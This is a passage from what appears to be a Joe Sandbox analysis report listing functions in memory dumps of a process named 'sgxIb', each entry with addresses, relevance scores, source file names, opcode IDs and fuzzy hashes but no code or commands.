                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH^q
                                                                                                            • API String ID: 0-2549759414
                                                                                                            • Opcode ID: 0876b557f0b01a22e3cee12b949a66dc6da0ecdec6e1486f7466127e0f65e885
                                                                                                            • Instruction ID: 9443bc9b51fd6e37f1bfb5974e61418bf6b626b7619dd36423c065a174d43e20
                                                                                                            • Opcode Fuzzy Hash: 0876b557f0b01a22e3cee12b949a66dc6da0ecdec6e1486f7466127e0f65e885
                                                                                                            • Instruction Fuzzy Hash: 6C31D230B102058FDB599B74C42876F7BE3AB89310F104869D806EB394DF75DE46CBA1
                                                                                                            Function 068583E8 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q
                                                                                                            • API String ID: 0-388095546
                                                                                                            • Opcode ID: ddfe8c38fa239151d7e30cafe8873553cac1c3bcfcb38c456da34c3ea429d47d
                                                                                                            • Instruction ID: 2a7022c810a798ffd1e1c55e8d703d4ffba87d519fa1c32cbf9535603a84b1be
                                                                                                            • Opcode Fuzzy Hash: ddfe8c38fa239151d7e30cafe8873553cac1c3bcfcb38c456da34c3ea429d47d
                                                                                                            • Instruction Fuzzy Hash: ECF0DCB0A002348FDF749A54AA412BC77A9FB40214F164867DE05CB264DB71DA05C791
                                                                                                            Function 06854B69 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \Ocq
                                                                                                            • API String ID: 0-2995510325
                                                                                                            • Opcode ID: 1925553550ce42ecf386e64c6553566621ac5dcf504fa08e6c3e5b0686757acb
                                                                                                            • Instruction ID: 2e06765e37c2ca4814c7c3dad42dd0cd77fa9fb9d3253eb8b937bb10f39c7fa5
                                                                                                            • Opcode Fuzzy Hash: 1925553550ce42ecf386e64c6553566621ac5dcf504fa08e6c3e5b0686757acb
                                                                                                            • Instruction Fuzzy Hash: 64F0DA30A10119DFDB14DFA4E9597AEBBF2FF88704F214559E402A7294CB741D45CF81
                                                                                                            Function 0685C2B0 Relevance: .6, Instructions: 632COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0005b6fe8a0caeb73aa23dec48da4c93e24f7fe97993591eca88cbf197b88e20
                                                                                                            • Instruction ID: 4646cc60b645368d28fdc94014ffaa917f9a393925f0a4327597ffc68e26035f
                                                                                                            • Opcode Fuzzy Hash: 0005b6fe8a0caeb73aa23dec48da4c93e24f7fe97993591eca88cbf197b88e20
                                                                                                            • Instruction Fuzzy Hash: 4F328034A103098FDB64DB68D990BADB7F2FB88315F118429E909EB355DB35EC42CB91
                                                                                                            Function 0685B3E7 Relevance: .6, Instructions: 558COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 54d39cc50ad8ac09523eb0b0ce22ac1b2e924457fc9068920382325040c6d20b
                                                                                                            • Instruction ID: fcd8a736e4d5f690ccf1ba0c853005bb628a8719bac52eb5cdb88c07d188c6e1
                                                                                                            • Opcode Fuzzy Hash: 54d39cc50ad8ac09523eb0b0ce22ac1b2e924457fc9068920382325040c6d20b
                                                                                                            • Instruction Fuzzy Hash: 63224D34E102098FDF64DB68D4A07ADB7F2FB99310F258825E909EB395DB34DC818B52
                                                                                                            Function 06856308 Relevance: .2, Instructions: 229COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0459f796e9ab4072e74e758b0a4dc408772476edf6ce6218d477cafcdd34386e
                                                                                                            • Instruction ID: c0583ee885bbc52866bda36db35b026b7fe0274855801af0b4453b7feb93816e
                                                                                                            • Opcode Fuzzy Hash: 0459f796e9ab4072e74e758b0a4dc408772476edf6ce6218d477cafcdd34386e
                                                                                                            • Instruction Fuzzy Hash: 8861F371F001214FCF109A7DC8846AFBAD7AFC4220B66443AE80EDB364EE65DD4287C2
                                                                                                            Function 068543BB Relevance: .2, Instructions: 222COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7057ba174152bf2530761a9c478c5c5fa538239b02513d394f66681bde6bb868
                                                                                                            • Instruction ID: f8add994d63b8d4b927b947ce8ba1a0824604ef436f34bd89b81480cac904a0a
                                                                                                            • Opcode Fuzzy Hash: 7057ba174152bf2530761a9c478c5c5fa538239b02513d394f66681bde6bb868
                                                                                                            • Instruction Fuzzy Hash: D1813C30B002099FDF54DBA9D5947AE77F6AF89304F118425D90ADB394EE70DC868B51
                                                                                                            Function 068546D4 Relevance: .2, Instructions: 214COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 25bbd413c8622f8f9bf5c316d413f7bb89cfbcfea68065b787e5dbc2abdb325a
                                                                                                            • Instruction ID: 620788507206eeb697ebbaf2ee571c4755acce7f63c5c325ba3b6032ab04f757
                                                                                                            • Opcode Fuzzy Hash: 25bbd413c8622f8f9bf5c316d413f7bb89cfbcfea68065b787e5dbc2abdb325a
                                                                                                            • Instruction Fuzzy Hash: EA914B74E102198BDF60DF68C880B9DB7B1FF89300F208599D549FB255EB70AA85CB91
                                                                                                            Function 068546E8 Relevance: .2, Instructions: 210COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5ad660176b12beefcb74704ff3c8e8f835b2264d6e399d518a38a2284711c89e
                                                                                                            • Instruction ID: 472bcf321c772f280dc84137b15b55358df596c730df404c79e8405638d735d1
                                                                                                            • Opcode Fuzzy Hash: 5ad660176b12beefcb74704ff3c8e8f835b2264d6e399d518a38a2284711c89e
                                                                                                            • Instruction Fuzzy Hash: 9F912A34E106198BDF60DF68C880B9DB7B1FF89310F208599D549FB355EB70AA858B91
                                                                                                            Function 0685F048 Relevance: .2, Instructions: 201COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7b3b55c9b7261fb70cb76c892b47a36dbd84b085ece4eacac2492a090839ad02
                                                                                                            • Instruction ID: 6a31d9fca774a38e57da68d811df8bc87d2acc847269f0e1c75158f741ef7af4
                                                                                                            • Opcode Fuzzy Hash: 7b3b55c9b7261fb70cb76c892b47a36dbd84b085ece4eacac2492a090839ad02
                                                                                                            • Instruction Fuzzy Hash: 98713D70A002099FCB54DFA9D980AADBBF6FF88304F258429E509EB355DB70ED46CB51
                                                                                                            Function 0685F039 Relevance: .2, Instructions: 199COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 60056fb007a376142c2ac61174a4bf8a9d2eedb7ef631c302976109033d4c438
                                                                                                            • Instruction ID: 6f0bb1f24ca18bb1176ccfa8029e3ee14eb2d3d5528fd4fe862bc50e6a4631ca
                                                                                                            • Opcode Fuzzy Hash: 60056fb007a376142c2ac61174a4bf8a9d2eedb7ef631c302976109033d4c438
                                                                                                            • Instruction Fuzzy Hash: 5F714C70A002499FCB54DBA8D990AADBBF6FF88304F258429E509EB355DB70ED46CB40
                                                                                                            Function 0685FCC9 Relevance: .2, Instructions: 173COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9a7f45f2bf22d2b8b099f7e2457d7b2e871c31834c28cc87663b4a4523687758
                                                                                                            • Instruction ID: 5c67350af17eb17f8e9e62d06c257112c9e930ef6a682b62441a46234612ff24
                                                                                                            • Opcode Fuzzy Hash: 9a7f45f2bf22d2b8b099f7e2457d7b2e871c31834c28cc87663b4a4523687758
                                                                                                            • Instruction Fuzzy Hash: 4C51F331E00205CFDF54AB78E8586ADBBB2FB88315F11887AE60ADB251DF358945CF81
                                                                                                            Function 0685FA78 Relevance: .2, Instructions: 169COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b70af404c5c932ca5eb7b455a4da3307f3bd1490af1040ff559c639377d68b30
                                                                                                            • Instruction ID: c5bbf32f929cd298673c96329da0ace5a9a087c2d2ca6a0e8c3dd1e851ceba25
                                                                                                            • Opcode Fuzzy Hash: b70af404c5c932ca5eb7b455a4da3307f3bd1490af1040ff559c639377d68b30
                                                                                                            • Instruction Fuzzy Hash: B051EF70B202249BEF646668D99472F369AD789311F21442AEB0ED37C4DF6CCC819B92
                                                                                                            Function 0685FA88 Relevance: .2, Instructions: 163COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0c765ef1866ee7058b62aa6d3214aa0b38d4a07580d298ca8b6829406c5ee7f5
                                                                                                            • Instruction ID: 7b91d2ac68e396d1cccd87928a932d9bb1a831bfb74dea092f0eb677dbf80805
                                                                                                            • Opcode Fuzzy Hash: 0c765ef1866ee7058b62aa6d3214aa0b38d4a07580d298ca8b6829406c5ee7f5
                                                                                                            • Instruction Fuzzy Hash: E451E170B202249BEF646668D99472F369AD789311F21443AEB0FD3784DF6CCC819B92
                                                                                                            Function 0685552B Relevance: .1, Instructions: 129COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 447302fff40a97a092f0236419431b15452a44aa2ba80dc578890f20823c8b8a
                                                                                                            • Instruction ID: d0837a446a9d7229d3478726a4e80a6762d4f16fd821b1442361dd27a31e8ccd
                                                                                                            • Opcode Fuzzy Hash: 447302fff40a97a092f0236419431b15452a44aa2ba80dc578890f20823c8b8a
                                                                                                            • Instruction Fuzzy Hash: D5416F71E007098FDF60CEA9D881ABFFBF2EB44310F11492AE615D7640D731E9458B92
                                                                                                            Function 06F32139 Relevance: .1, Instructions: 118COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4144663887.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6f30000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 13a6d1b1506e07e526bc1b1367021f0472b70b646ce96209bb97e17394b8d037
                                                                                                            • Instruction ID: 06abb445cfbafefa9828a33e59ffbcdce1c6a6baf491c70ce0bcff3280e1c3d4
                                                                                                            • Opcode Fuzzy Hash: 13a6d1b1506e07e526bc1b1367021f0472b70b646ce96209bb97e17394b8d037
                                                                                                            • Instruction Fuzzy Hash: A9417131E107199FDB14DFA9C94469DBBB1FF88300F14C669E8457B264EB70EA81CB90
                                                                                                            Function 0685DA98 Relevance: .1, Instructions: 96COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 526e8b661d089cc196b5be591c7c963b5de3c129f97d86bb8b616181c630d15e
                                                                                                            • Instruction ID: 05ce0983ebb7c6020fc4795dfe0697907de1fdb8940424cf2684006eb7445299
                                                                                                            • Opcode Fuzzy Hash: 526e8b661d089cc196b5be591c7c963b5de3c129f97d86bb8b616181c630d15e
                                                                                                            • Instruction Fuzzy Hash: 3431C430E1031A8FCF65DF68D58069EBBF2FF85304F154925E905EB254EB70A986CB41
                                                                                                            Function 06852080 Relevance: .1, Instructions: 96COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a0002016179ba945821ae88ae653dfea71268940fc62c50f643d41db3ebc314b
                                                                                                            • Instruction ID: 4bf5aa2979138c848d6be97d2c030a3dea7dba50710ae58d684b04adc5823983
                                                                                                            • Opcode Fuzzy Hash: a0002016179ba945821ae88ae653dfea71268940fc62c50f643d41db3ebc314b
                                                                                                            • Instruction Fuzzy Hash: 41318D34E106059FCB49DFA4D86469EB7F6FF89300F108929E906EB340EF71A942CB40
                                                                                                            Function 06852090 Relevance: .1, Instructions: 91COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ba326c5fb091020ea2cad4560f8443556f3ecf0d07afdb88cb1d6c0c006970bd
                                                                                                            • Instruction ID: 4edc003ed42d9c97d4068acb7191579f2ff76217ef496c79bac816b661c489b1
                                                                                                            • Opcode Fuzzy Hash: ba326c5fb091020ea2cad4560f8443556f3ecf0d07afdb88cb1d6c0c006970bd
                                                                                                            • Instruction Fuzzy Hash: 5D314D34E106059BCB59DFA4D8646AEB7F6FF89300F108529E90AEB350EF71AD46CB50
                                                                                                            Function 06F32990 Relevance: .1, Instructions: 81COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4144663887.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6f30000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 20a3c58b80df6e2914f56d2268b5adf72cc742f540d17be6096059c46362ead8
                                                                                                            • Instruction ID: bf35123c53d3a978baac0581d0e4fc2fd5ca28f1716f2774e04d490d1c4f95b7
                                                                                                            • Opcode Fuzzy Hash: 20a3c58b80df6e2914f56d2268b5adf72cc742f540d17be6096059c46362ead8
                                                                                                            • Instruction Fuzzy Hash: 68213D30B102158FCB14EB78C884B6E3BBAEB88304F204029E509D7395EF74AD42CBA1
                                                                                                            Function 06853508 Relevance: .1, Instructions: 80COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 257a6d30088f622fdafea120ceda13803e5b85b0f034d382100c38bfdc227856
                                                                                                            • Instruction ID: 532e039814fdc983dc9f9d02160dfa774e6b3b54efd1550025fadec9726f92e5
                                                                                                            • Opcode Fuzzy Hash: 257a6d30088f622fdafea120ceda13803e5b85b0f034d382100c38bfdc227856
                                                                                                            • Instruction Fuzzy Hash: D621F4B2E053644FCB46DB78CC512DEBFF1AF8A204F094897C445EB252EA30C945CB92
                                                                                                            Function 06853FC1 Relevance: .1, Instructions: 79COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5e6edab947044d6883f10831a06e3d49487497890860f9b72c98b4f82b3d9a93
                                                                                                            • Instruction ID: b804a9d55b9e67cb1031a170286b6f71d3262bbd0712dcb97e469fc5a41aea27
                                                                                                            • Opcode Fuzzy Hash: 5e6edab947044d6883f10831a06e3d49487497890860f9b72c98b4f82b3d9a93
                                                                                                            • Instruction Fuzzy Hash: 72218975E002059FDB50DF69D981AAEBBF5FB48300F108026EA06E7384EB35EC41CB91
                                                                                                            Function 06853FD0 Relevance: .1, Instructions: 78COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4e410ee11f797f9fb256a257593c75d1f24c3d8da2924e04f9e5e863f1998d5b
                                                                                                            • Instruction ID: b605096f01ef41057c4ac2d2e88b719479198f2073470f36b692a2d4833f82b9
                                                                                                            • Opcode Fuzzy Hash: 4e410ee11f797f9fb256a257593c75d1f24c3d8da2924e04f9e5e863f1998d5b
                                                                                                            • Instruction Fuzzy Hash: 2C21AC75F002159FDB50DF69D980AAEBBF5FB48300F108026EA06E7384EB35DD418B90
                                                                                                            Function 06F324BC Relevance: .1, Instructions: 76COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4144663887.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6f30000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bb7db1233b9ae69225d4f3b46674bdc5e8f0ba5225282a7719c4fb7bd8b70c83
                                                                                                            • Instruction ID: f658f0ae021fc7189fc39209257fc6bbd77861aa9744948385d4bec0fbad5c54
                                                                                                            • Opcode Fuzzy Hash: bb7db1233b9ae69225d4f3b46674bdc5e8f0ba5225282a7719c4fb7bd8b70c83
                                                                                                            • Instruction Fuzzy Hash: 803102B0D01258DFDB60CF99C959B8EBFF5AF49310F64801AE454AB241C7B49A45CFA1
                                                                                                            Function 06F329A0 Relevance: .1, Instructions: 76COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4144663887.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6f30000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d58547ed704e4c6a24560ec37022bea3fd6faedac4c45c0a157e259048a593ed
                                                                                                            • Instruction ID: 813d24597e6184a881825d9545e8dfa3054ab1e476a2351a39506e12d0b5e480
                                                                                                            • Opcode Fuzzy Hash: d58547ed704e4c6a24560ec37022bea3fd6faedac4c45c0a157e259048a593ed
                                                                                                            • Instruction Fuzzy Hash: 78210174B102159FCB44EB78D984B6F77EAEB88304F204028E609D7354EF75AD42C7A1
                                                                                                            Function 0685B038 Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e2995e455abb5566837e8ced2e473701ebb99b4c0aa67713d7fe39994ea92fba
                                                                                                            • Instruction ID: a79865bc23095c393e69ea21ab19427534eca5cb8450b528424fb64ccb13b68e
                                                                                                            • Opcode Fuzzy Hash: e2995e455abb5566837e8ced2e473701ebb99b4c0aa67713d7fe39994ea92fba
                                                                                                            • Instruction Fuzzy Hash: 53217C71D1071D8BCF64CFA9C85069EBBF5FF95300F11492AE909EB240EBB09885CB81
                                                                                                            Function 00E2D030 Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4120549021.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_e2d000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d8fa0b561367fb33b573c4c696ab1b23c02fc845420615cae789ac06c6d78272
                                                                                                            • Instruction ID: 8c2521355d49609929b9376b37429968f3776abb02694ce5c837713e9e9c5d12
                                                                                                            • Opcode Fuzzy Hash: d8fa0b561367fb33b573c4c696ab1b23c02fc845420615cae789ac06c6d78272
                                                                                                            • Instruction Fuzzy Hash: 3D212571608204DFCB10DF14EDC0F26BBA6FB84318F24C66DDA0A5B2A2C336D807CA61
                                                                                                            Function 00E2D005 Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4120549021.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_e2d000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d7aa265ea9a970ea4503994fd09fec53d5ca58955b2f4fdb07d9fd1b4c30c3b2
                                                                                                            • Instruction ID: 0e10e904266cd8db2a9aabe5ff01367a793f4b39492e692d61bfbb15ab50edf3
                                                                                                            • Opcode Fuzzy Hash: d7aa265ea9a970ea4503994fd09fec53d5ca58955b2f4fdb07d9fd1b4c30c3b2
                                                                                                            • Instruction Fuzzy Hash: 25215C7150D3C09FC703CB24D994B11BF71EB46214F29C5DBD9898F2A7C23A981ACB62
                                                                                                            Function 00E2D1F8 Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4120549021.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_e2d000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a6308df58adb61b1c970960dec94d3a41dc53708b43b75c495c6e8f881e499a0
                                                                                                            • Instruction ID: d37187dbc18a86be184dc55e43465e642dc8437d368d896786950ce2d1abd065
                                                                                                            • Opcode Fuzzy Hash: a6308df58adb61b1c970960dec94d3a41dc53708b43b75c495c6e8f881e499a0
                                                                                                            • Instruction Fuzzy Hash: 4B2129B2508200DFDB11DF14EDC4B26BB65FB94324F34C969E9091B355C336D806CA61
                                                                                                            Function 00E2D3A8 Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4120549021.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_e2d000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d02bc4d49bb1b82636f044fcf03ca1ffea640ce5aeb4d7af664cbf7a2684397e
                                                                                                            • Instruction ID: a847aceab2885fefbeb2a1ddc6b49d15096a5b8867c361a876dac97b99f680b6
